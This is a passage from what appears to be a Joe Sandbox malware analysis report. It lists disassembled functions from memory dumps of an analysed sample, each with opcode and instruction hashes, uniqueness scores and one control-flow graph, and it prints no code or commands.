                                                                                                                              • Opcode Fuzzy Hash: f3ddcb0431e8e1845beb03f0606022e050192c0d45a65cc620a8cd965e5dfd2b
                                                                                                                              • Instruction Fuzzy Hash: 65E1A034E00254CFDB28DFA8C4859DDB7F7BF89244B24806EE496AB351DB31AC4ACB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053BA850 Relevance: .4, Instructions: 356COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1122 53ba850-53ba875 1123 53ba877-53ba883 1122->1123 1124 53ba885 1122->1124 1125 53ba887-53ba88c 1123->1125 1124->1125 1127 53ba8a8-53ba8f5 1125->1127 1128 53ba88e-53ba8a5 1125->1128 1134 53ba8fb-53ba903 1127->1134 1135 53ba9c2-53ba9d7 1127->1135 1128->1127 1136 53ba922-53ba92f 1134->1136 1137 53ba905-53ba920 1134->1137 1141 53ba9d9-53ba9e8 call 53b89a0 1135->1141 1142 53baa10-53baa22 1135->1142 1143 53ba931-53ba94c 1136->1143 1137->1143 1141->1142 1147 53ba9ea-53ba9f1 1141->1147 1149 53baa78-53baa7c 1142->1149 1150 53baa24-53baa54 1142->1150 1159 53ba95b-53ba95f 1143->1159 1160 53ba94e-53ba951 1143->1160 1147->1142 1151 53ba9f3-53baa0d call 53b6740 1147->1151 1152 53baaab-53baac3 1149->1152 1153 53baa7e-53baa8f 1149->1153 1184 53baa5a-53baa73 1150->1184 1185 53bab7c-53bab8f 1150->1185 1151->1142 1167 53bab1d-53bab30 1152->1167 1168 53baac5-53baacb 1152->1168 1162 53baa9e-53baaa8 1153->1162 1163 53baa91-53baa9c 1153->1163 1164 53ba979-53ba97f 1159->1164 1165 53ba961-53ba977 call 53b6740 1159->1165 1174 53ba959 1160->1174 1162->1152 1163->1162 1169 53baca5-53bacb1 1164->1169 1170 53ba985-53ba9a0 call 53b6740 1164->1170 1165->1164 1176 53bab96-53bab9f 1167->1176 1171 53baacd-53baadd 1168->1171 1172 53baae5-53baafa 1168->1172 1194 53bac48-53bac57 1169->1194 1195 53bacb3-53bacb9 1169->1195 1215 53ba9a6-53ba9bc 1170->1215 1171->1172 1193 53baadf-53baae3 1171->1193 1239 53baafd call 53bb290 1172->1239 1240 53baafd call 53bb280 1172->1240 1174->1159 1181 53baba1 1176->1181 1182 53babe7-53babeb 1176->1182 1183 53baba4-53babb9 1181->1183 1190 53babed-53babfe 1182->1190 1191 53bac45 1182->1191 1207 53babbb-53babc1 1183->1207 1208 53babde-53babe5 1183->1208 1184->1176 1185->1176 1189 53bab03-53bab05 1189->1167 1196 53bab07-53bab15 call 53b7d08 1189->1196 1190->1191 1210 53bac00-53bac15 1190->1210 1191->1194 1193->1172 1200 53bab32-53bab55 1193->1200 1212 53bac59-53bac68 1194->1212 1213 53bac7e-53bac91 1194->1213 1203 53bacbb 1195->1203 1204 53bacc6 1195->1204 1209 53bab1a 1196->1209 1232 53bab59-53bab7a 1200->1232 1233 53bab57 1200->1233 1203->1204 1211 53bacc7 1204->1211 1207->1169 1214 53babc7-53babd5 call 53b6740 1207->1214 1208->1182 1208->1183 1209->1167 1218 53bac20-53bac22 1210->1218 1219 53bac17 1210->1219 1211->1211 1212->1213 1227 53bac6a-53bac6f call 53b6740 1212->1227 1213->1195 1214->1208 1215->1134 1215->1135 1218->1191 1220 53bac24-53bac3c call 53b6740 1218->1220 1219->1218 1220->1191 1235 53bac74-53bac79 call 53b8330 1227->1235 1232->1176 1233->1232 1235->1213 1239->1189 1240->1189
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 48dbef74457fa1d94ad5dce458f108b26c9281440f3766c60bc58edb9f795c88
                                                                                                                              • Instruction ID: e7b04b9a4f7591d05b64456653b6449385422e3a2d6b6f798d5a0fc0992f0d30
                                                                                                                              • Opcode Fuzzy Hash: 48dbef74457fa1d94ad5dce458f108b26c9281440f3766c60bc58edb9f795c88
                                                                                                                              • Instruction Fuzzy Hash: 62E10675B005189FDB14DFA8D994AEEBBB2BF88200F158069E516EB760DBB0DD41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053BDD98 Relevance: .3, Instructions: 296COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e6bfef4f57eb101c2236ceec1a745b895668b6343467dd489f60ca0f1d779fb
                                                                                                                              • Instruction ID: a1539f3d49dadfe289d55547d17d1a9bae26fe2f96c604aa009dcde19df09ccb
                                                                                                                              • Opcode Fuzzy Hash: 8e6bfef4f57eb101c2236ceec1a745b895668b6343467dd489f60ca0f1d779fb
                                                                                                                              • Instruction Fuzzy Hash: ABA1D8357042018FDB09DB79C854AAEB7E7EFC9214B198469D60ACBB61EFB1DC02C791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01360A69 Relevance: .3, Instructions: 281COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.604666560.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1360000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9047bb1846465a268f2fcb3d77191737d523ba5dcb947e8e2899ee17ef781b2
                                                                                                                              • Instruction ID: cba3ef635c0f9af6293e8621d01486ae55b0abd48b3f05a125dbc3f9197b4038
                                                                                                                              • Opcode Fuzzy Hash: f9047bb1846465a268f2fcb3d77191737d523ba5dcb947e8e2899ee17ef781b2
                                                                                                                              • Instruction Fuzzy Hash: 53D0926050D2C89FCB1353706C6C4E87F715D5715134D04EFE08ACB8B3C568041ADB02
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0136485B Relevance: .3, Instructions: 266COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.604692162.0000000001363000.00000040.00000800.00020000.00000000.sdmp, Offset: 01363000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1363000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9a291d2e8bb1ba592ea2770a00f17d92de4c5b47dcef855f58b7885c44c51c19
                                                                                                                              • Instruction ID: 5e79f9ffed7fd18eea0f483ac9f850ef1a42f7e9782c96598b3bea4ddf8008e4
                                                                                                                              • Opcode Fuzzy Hash: 9a291d2e8bb1ba592ea2770a00f17d92de4c5b47dcef855f58b7885c44c51c19
                                                                                                                              • Instruction Fuzzy Hash: 8391C331F041448FEB656A38D19067D36EFDB82648B10C2A6D556CB769EF34CC4BC762
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B11C8 Relevance: .3, Instructions: 262COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9d5f13aa9da127b990679947b15895a50adf7be7c364a862407d906fdde8851a
                                                                                                                              • Instruction ID: 7fbc8ffd81e4ec37e4cebf5a7df0c28f7c3a5c5965c47bd835bb8af7dc459006
                                                                                                                              • Opcode Fuzzy Hash: 9d5f13aa9da127b990679947b15895a50adf7be7c364a862407d906fdde8851a
                                                                                                                              • Instruction Fuzzy Hash: C0B16875A00605CFCB14CFA9C5849AAFBF2FF88314B248699E509DB726D770EC45CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B7878 Relevance: .2, Instructions: 250COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d2261f1bb7199a57dde195af80b1f90e51092b10a176d75e94eecabfae7d99e
                                                                                                                              • Instruction ID: 9fd426e4b9a1995c832a159a6187ceaf9ea4e4eabda02b627fbffaa0de70a13b
                                                                                                                              • Opcode Fuzzy Hash: 5d2261f1bb7199a57dde195af80b1f90e51092b10a176d75e94eecabfae7d99e
                                                                                                                              • Instruction Fuzzy Hash: 94A18C30A002089FEB15CFA4C595BEDBBB2FF88304F158059E505AB7A5CBB4AD85DB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B7240 Relevance: .2, Instructions: 246COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab292a1e76fefca36c8138ef0fa79c58f6df1282a8491c67c5068386096c6aa8
                                                                                                                              • Instruction ID: add8a10ba3ad88ba64f24253bef7ec5053ff5e443ecc5839cfa51211b64d1189
                                                                                                                              • Opcode Fuzzy Hash: ab292a1e76fefca36c8138ef0fa79c58f6df1282a8491c67c5068386096c6aa8
                                                                                                                              • Instruction Fuzzy Hash: 73A1CF35A00215CFCB14DF68D484AAEBBF1FF85314B10846EE11AABB41DB75ED49CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B51A8 Relevance: .2, Instructions: 242COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 29067af8a75e240ab84c38dc0a1933d7f94e98e1077f1797d168147c8f51675f
                                                                                                                              • Instruction ID: d7cde555d415390afaf8c171a14e13830ff4cb7b4434a09bb79bba4cdfe2842a
                                                                                                                              • Opcode Fuzzy Hash: 29067af8a75e240ab84c38dc0a1933d7f94e98e1077f1797d168147c8f51675f
                                                                                                                              • Instruction Fuzzy Hash: 61917F34B002049FDB04EF68D4D46EEB7E2EF84214F18C559C11AABB91DBB49D499BD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B6069 Relevance: .2, Instructions: 237COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 11d351630fc590d087a0a130fce998211a3053bb203b1f6785357e1c614a4924
                                                                                                                              • Instruction ID: 929af6d04a21f7e23a51ebda0bdf3b4b0dd74dd23862c398cde681eae3677e38
                                                                                                                              • Opcode Fuzzy Hash: 11d351630fc590d087a0a130fce998211a3053bb203b1f6785357e1c614a4924
                                                                                                                              • Instruction Fuzzy Hash: 30914E30B001198FDF04DFA8C995AAEBBF2FF48204F158069E505AB762DB71EC46CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B6740 Relevance: .2, Instructions: 219COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e2711f830d922ef6e0d12459563c1eeba14125d2d517ef8211f665fcd46db981
                                                                                                                              • Instruction ID: 2285b5823445131f8292ee6f3aef5784778c68f0f5da0642a79d1c4077a9bfea
                                                                                                                              • Opcode Fuzzy Hash: e2711f830d922ef6e0d12459563c1eeba14125d2d517ef8211f665fcd46db981
                                                                                                                              • Instruction Fuzzy Hash: B981E5B1A040149FEF149B64C4562FCB3B6FF84384F658459C60BAFB62EBB85C44D762
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B0D00 Relevance: .2, Instructions: 211COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b4a1297b9b3b664f5b223cca6932daf5c74ae9c0956e19961176bea94e6e070
                                                                                                                              • Instruction ID: a7198a6c1c42d6b4eb773b757914ab2d69ec3456815f20c85182271d094e3920
                                                                                                                              • Opcode Fuzzy Hash: 4b4a1297b9b3b664f5b223cca6932daf5c74ae9c0956e19961176bea94e6e070
                                                                                                                              • Instruction Fuzzy Hash: 3771AB357006049FCB24DFA8C8949AEBBF6FF88314B148529E50ADBB51DB35ED05CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E3185E Relevance: .2, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612963346.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e30000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b949f9a8ff2508cbdf7ca4d437154f030717e3337c925ef7d742ea4eb39f2a87
                                                                                                                              • Instruction ID: 3666ba19aef3e9ce8d444a7e576c53f0ee341713cd86fa016f0a6f7aa60052ac
                                                                                                                              • Opcode Fuzzy Hash: b949f9a8ff2508cbdf7ca4d437154f030717e3337c925ef7d742ea4eb39f2a87
                                                                                                                              • Instruction Fuzzy Hash: 2D717C30E10259CFDB28DF98C4859DDB7B2BF88304B24915ED4966B351EB32AD86CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B29AB Relevance: .2, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b5a7d45cbb9f43ba4a9e51f9f49834eafcfd296a06a52f35b67ac34850099f3a
                                                                                                                              • Instruction ID: 41e391700a8a14e0fa4057ab1234434ce7a96d79846435153b437cb152330f77
                                                                                                                              • Opcode Fuzzy Hash: b5a7d45cbb9f43ba4a9e51f9f49834eafcfd296a06a52f35b67ac34850099f3a
                                                                                                                              • Instruction Fuzzy Hash: A5812738A10129AFDF14DF98D984EEEB7B6FF88300F218615F505B7654CBB0A841CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B45D0 Relevance: .2, Instructions: 172COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 75969cde9b221fd067615a28dc8b11d5f5db9647c8fb04e57f3cb0a33bbc8821
                                                                                                                              • Instruction ID: 8b2586f21940699a48d65882c9502b050a46c056403d12678e6235d6544594c2
                                                                                                                              • Opcode Fuzzy Hash: 75969cde9b221fd067615a28dc8b11d5f5db9647c8fb04e57f3cb0a33bbc8821
                                                                                                                              • Instruction Fuzzy Hash: E5510F34B002059BDF04DF68C450AFEB3A7EF84294B148429EA19CBB42EBB4DD118B92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B245E Relevance: .2, Instructions: 157COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9160c1060f475b979b4735884c61dfa94f8e3def9bca759a5c5890e9a171e36a
                                                                                                                              • Instruction ID: 372d5d95bd9933ed959554e5aa4e34dc35ad7893148b3212c6127838c3f624c9
                                                                                                                              • Opcode Fuzzy Hash: 9160c1060f475b979b4735884c61dfa94f8e3def9bca759a5c5890e9a171e36a
                                                                                                                              • Instruction Fuzzy Hash: B0517875E01218AFCB05CFA8D9859AEFBB6FF88310F10852AF916A7751CB749D41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B44C1 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d467d3746246f2d78f29502d2e1fe6bb81167619d2690191a5128032760ab262
                                                                                                                              • Instruction ID: d032c4bc69cd0bc74c8dec27a2b53cb1dbe6945c1fe77f57fd06563643cb14ed
                                                                                                                              • Opcode Fuzzy Hash: d467d3746246f2d78f29502d2e1fe6bb81167619d2690191a5128032760ab262
                                                                                                                              • Instruction Fuzzy Hash: FE51B130B042499FDF10DF68C884AEABBF6FF45350B14846AE959CB752E7B0E904CB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E31E8F Relevance: .1, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612963346.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e30000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 950788217d7fffc09f290d42fab85fcf218c239d0cbd538dc748f25a8a5b5a2a
                                                                                                                              • Instruction ID: 2f6539fa4d4bcb9362da20f1b5d4f1b6ec626291353564d7f6fa67299b3f097d
                                                                                                                              • Opcode Fuzzy Hash: 950788217d7fffc09f290d42fab85fcf218c239d0cbd538dc748f25a8a5b5a2a
                                                                                                                              • Instruction Fuzzy Hash: F851E334E053909FD725CF58D4859DEBFF6EF8A204B15419EE481AB302CB36AC49CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B0788 Relevance: .1, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d345b8144b7570735a7053a2e91ed3eaff534c65b15d90eae111c35c1adfa795
                                                                                                                              • Instruction ID: d81ff95340a5d2b7d01e40f23120e3e8fdba22e01afc617d2cfb4a57f3fcb9f5
                                                                                                                              • Opcode Fuzzy Hash: d345b8144b7570735a7053a2e91ed3eaff534c65b15d90eae111c35c1adfa795
                                                                                                                              • Instruction Fuzzy Hash: 3B417A31B042659FCB0ADB78C4548AEBBF1FF86214B0581AAD54DCB752C7349C46CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B1830 Relevance: .1, Instructions: 136COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eb22bf431312e2fdec880a288ff881627e38ec00c095117a5bd64a6ed8f36587
                                                                                                                              • Instruction ID: 465d589db30fee628f260fed30a37ebfd75bc39f60cdc7c82f18a2ce1a845cab
                                                                                                                              • Opcode Fuzzy Hash: eb22bf431312e2fdec880a288ff881627e38ec00c095117a5bd64a6ed8f36587
                                                                                                                              • Instruction Fuzzy Hash: 8851DE31A04645AFEB21DFA8C5A09EEBBF6BF80254F004819E6468BF00DB70E945CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053BB290 Relevance: .1, Instructions: 136COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 76c09505ca5e6023346aebf7f953f74d5a091a6b5e55a63ea17d6e32d3c67691
                                                                                                                              • Instruction ID: ae4221665bade2c8d655a6f3d585f3f3391000ffd4b2119beef25000682820d5
                                                                                                                              • Opcode Fuzzy Hash: 76c09505ca5e6023346aebf7f953f74d5a091a6b5e55a63ea17d6e32d3c67691
                                                                                                                              • Instruction Fuzzy Hash: 9341F832B042108FEB109F69D854B6E73AAAFC5250F158176E60ACB7A1DFB4DC06C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 05E31B43 Relevance: .1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612963346.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_5e30000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 748a6b2e8837f7167ec0b63a4edc6f63d40bb0bb3accd75dc4b012723152e67f
                                                                                                                              • Instruction ID: eded091467aba1f9ab3c3cfa1449ef458040fcb9784aa12837963eafe55da39f
                                                                                                                              • Opcode Fuzzy Hash: 748a6b2e8837f7167ec0b63a4edc6f63d40bb0bb3accd75dc4b012723152e67f
                                                                                                                              • Instruction Fuzzy Hash: 21411334E01644AFD718CF58D485ADEBBF6EF89244F20846EE855AB700CB31AC4ACF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B47D0 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 92139843d406f03d5a2246d3424554c846f42c54e5fce09c1a5b67b0f78ea12b
                                                                                                                              • Instruction ID: de458a2b7b4f0ca35b2ef694f8706258da98fb0c62d9e71b5fcf340fedc53335
                                                                                                                              • Opcode Fuzzy Hash: 92139843d406f03d5a2246d3424554c846f42c54e5fce09c1a5b67b0f78ea12b
                                                                                                                              • Instruction Fuzzy Hash: ED51F634A002098FDB04DF68C584ADDBBF2BF8C304F2485A9E405AB765DBB1AD45CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 053B4330 Relevance: .1, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.612626409.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_53b0000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ae143bd4fb1cdd5b37f0eb9f2adfe10f213fcc1c83610ca228d0ae43d94d2615
                                                                                                                              • Instruction ID: 2262330c7bc078d197f6c82e36e786506f817a1e78b0fedf8c876e643872581c
                                                                                                                              • Opcode Fuzzy Hash: ae143bd4fb1cdd5b37f0eb9f2adfe10f213fcc1c83610ca228d0ae43d94d2615
                                                                                                                              • Instruction Fuzzy Hash: 1B316B323042201FCB15BB79A4215EE7B67EFC2A48744846DD50ECFB42EF699E0953D6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0136F300 Relevance: .1, Instructions: 103COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.604692162.0000000001363000.00000040.00000800.00020000.00000000.sdmp, Offset: 01363000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1363000_FILE.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 18d00a2448edee96987a4a704fa01b374fd6d4524c785885494b503b2be8ed66
                                                                                                                              • Instruction ID: 54e18fff6f1cf502a8f606c7b7e9d2e478c3583ff194c7363053af7307fdc397
